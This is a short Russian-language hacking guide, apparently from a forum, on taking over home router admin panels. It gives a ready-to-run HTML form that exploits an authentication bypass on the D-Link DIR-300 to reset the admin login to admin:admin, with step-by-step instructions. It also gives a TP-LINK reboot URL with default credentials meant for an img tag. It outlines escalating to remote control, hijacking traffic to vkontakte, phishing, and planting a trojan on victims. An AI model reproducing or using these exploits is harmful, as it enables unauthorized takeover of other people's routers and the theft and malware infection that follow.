
5)Взлом админки роутера
На примере DIR-300 Открываем блокнот и Ctrl+C - Ctrl-V в него вот этот html запрос. Только IP поменяйте на IP роутера .
<form action="http://192.168.0.1:80/tools_admin.php" method="POST">
<input type="hidden" name="ACTION_POST" value="LOGIN">
<input type="hidden" name="LOGIN_USER" value="a">
<input type="hidden" name="LOGIN_PASSWD" value="b">
<input type="hidden" name="login" value="+Log+In+">
<input type="hidden" name="NO_NEED_AUTH" value="1">
<input type="hidden" name="AUTH_GROUP" value="0">
<input type="hidden" name="admin_name" value="admin">
<input type="hidden" name="admin_password1" value="admin">
<input type="submit">
</form> Сохраняем в разрешении .html Открываем полученную страничку и жмем кнопочку. В ответ напишет, что мол только авторизированный пользователь может и бла-бла. Не читайте, он врёт :) И преспокойненько логинемся на роутер под admin:admin Дальше всё стандартно.
Уязвимость беспроводных роутеров TP-LINK
Админка роутера управляляется GET-запросами. А это значит, что поместив, допустим, ссылку http://admin:admin@192.168.1.1/userRpm/SysRebootRpm.htm?Reboot=Reboot в аттрибут src тега img, мы перезагрузим роутер человека, не сменившего первоначальные настройки. Ну, в том числе и по этой причине, не стану демонстрировать готовую «картинку». Аналогично со всем управлением, кроме, возможно, перепрошивки. К чему это может привести? К полному управлению роутером! К тому же, нехитрыми действиями можно открыть удалённое управление роутером и сообщить на свой сервер ip-адрес жертвы. Изменить маршрут до сервера vkontakte и с помощью фишинга, который проблематично будет обнаружить, заставляем жертву установить троян. А всё от того, что кто-то поленился сменить настройки по умолчанию…
Источники
http://ru.1337day.com/search
http://habrahabr.ru/company/xakep/
http://forum.xakep.ru/
http://airslax.ru/